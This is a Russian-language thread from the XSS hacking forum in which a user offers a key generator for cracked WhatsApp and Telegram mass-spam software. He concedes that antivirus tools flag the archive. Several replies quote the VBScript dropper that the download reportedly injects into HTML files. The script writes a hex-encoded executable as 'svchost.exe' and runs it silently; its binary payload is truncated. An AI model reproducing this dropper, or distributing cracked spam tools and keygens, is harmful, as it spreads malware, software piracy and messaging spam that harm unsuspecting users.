• XSS.stack #1 – первый литературный журнал от юзеров форума

cпам/флуд Whatsapp и Telegram soft and KeyGen by Chex

Chex

RAID-массив
Пользователь
Регистрация
15.07.2021
Сообщения
66
Реакции
212
40c584096501.jpg


c1fe10336402.jpg


b329d4e34b0d.jpg

В целом понятно что это софт по рассылке в Whatsapp и Telegram. Полное описание которого можно найти на официальных сайтах. Обращу ваше внимание: Софт не я крякал и он не мой а барыгам крякнули а они повесили протектор и давай продавать в сети :D. Я же в свою очередь написал только генератор ключей :cool: , что бы каждый смог себе активировать желаемый софт. Вирусототал стразу говорю грязный потому как накрыты программы паблик протектором, у кого сомнения то запускайте на виртуалке.

Обратите внимание, перед тем как сгенерировать ключ, отметьте именно программу под которую будете делать ключ.

0b3237f61041.jpg


В архиве с программами есть инструкция по активации в виде Gif анимации, если кто не разберётся. Надеюсь софт будет полезен и мои труды не зря :D.
 
В Софте для вотсап вшит дроппер, который подкидывает троянчики, которые редачать html файлы на харде добавляя скрипт бейсика))
Там не то совсем. Смотри, первое что там идет протектор паблик версия Enigma Protector (демка крякнутая) а барыга что пытался продавать софт просто тупо поставил птички в настройках на все что есть ;). После чего он упаковал подобной какой ;) софт.

Я всего лишь сделал KeyGen под под эту защиту. Если бы такое было и в правду то я бы предупредил всех перед скачиванием (Хотя я и сказал что лучше запускать на виртуалке, но не за того что не уверен в том что проверял а за того что есть люди которые в этом мало понимают и для них лучше так). Там идут модули .dll под enigma и вот как раз они могут показаться при анализе неопытным людям как ЗЛО :). Но на само деле это не так, вот такая то и картина :smile10:.
 
Там не то совсем. Смотри, первое что там идет протектор паблик версия Enigma Protector (демка крякнутая) а барыга что пытался продавать софт просто тупо поставил птички в настройках на все что есть ;). После чего он упаковал подобной какой ;) софт.

Я всего лишь сделал KeyGen под под эту защиту. Если бы такое было и в правду то я бы предупредил всех перед скачиванием (Хотя я и сказал что лучше запускать на виртуалке, но не за того что не уверен в том что проверял а за того что есть люди которые в этом мало понимают и для них лучше так). Там идут модули .dll под enigma и вот как раз они могут показаться при анализе неопытным людям как ЗЛО :). Но на само деле это не так, вот такая то и картина :smile10:.
аваст определил дроппер, на чистой машине, и вот это потом в html доках появляется в конце скрипта)))
</body></html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003 ,,, 000000000000000000000000000000000000000000000000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
 
аваст определил дроппер, на чистой машине, и вот это потом в html доках появляется в конце скрипта)))
</body></html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003 ,,, 000000000000000000000000000000000000000000000000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Ну это видать взято от сюда (для примера реакция антивируса) https://stackoverflow.com/questions...-piece-of-vb-code-getting-added-automatically, когда запускается сам модуль (плагин) зашиты в протекторе то такое всегда будет отображаться при подобной упаковке (То есть реакция Аваста). Я же потому и сказал выше что если есть сомнения то виртуалка в помощь. Особенно если при защите был включен модуль memHack.dll. Вы хоть не подумайте что я защищаю того кто распространяет софт, неправильно упаковывая его ( ну как неправильно, просто прямолинейно так сказать :cool:). Я сделал генератор ключей и все а после указал что к чему ( как пользоваться), так что без обид. Или это претензия ко мне ?, чисто вопрос ? :cool:
 
Ну это видать взято от сюда (для примера реакция антивируса) https://stackoverflow.com/questions...-piece-of-vb-code-getting-added-automatically, когда запускается сам модуль (плагин) зашиты в протекторе то такое всегда будет отображаться при подобной упаковке (То есть реакция Аваста). Я же потому и сказал выше что если есть сомнения то виртуалка в помощь. Особенно если при защите был включен модуль memHack.dll. Вы хоть не подумайте что я защищаю того кто распространяет софт, неправильно упаковывая его ( ну как неправильно, просто прямолинейно так сказать :cool:). Я сделал генератор ключей и все а после указал что к чему ( как пользоваться), так что без обид. Или это претензия ко мне ?, чисто вопрос ? :cool:
я тестил на запасной машине,а не виртуалке)) претензии нет, просто данный старенький вирусняк сидит в дллках. предупредил остальных чтобы лишний раз систему не откатывали.
 
я тестил на запасной машине,а не виртуалке)) претензии нет, просто данный старенький вирусняк сидит в дллках. предупредил остальных чтобы лишний раз систему не откатывали.
Как то выделю время и напишу статью для форума xss.pro и покажу все нюансы в подобных ситуациях (протекторы, упаковка, библиотеки, реакция антивирусов и не только) а именно на что нужно обратить внимание а что срабатывает, реагирует (правильно, неправильно и не только) на то и то и после - будет более ясная картина. Я уверен что, после, подобных вопросов будет меньше. Но твое мнение уважаю и принимаю любую критику, это нормально. :smile10:
 
Тс пропал
Кто знает где он?
Пишу в лс в тг - молчит, здесь - не появлялся давно
ТС оживи)
Софт надо обновленный под ТГ поди?
 
аваст определил дроппер, на чистой машине, и вот это потом в html доках появляется в конце скрипта)))
</body></html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A900003 ,,, 000000000000000000000000000000000000000000000000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Любимая, старая как мир тема с svchost... Oldschool ;)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх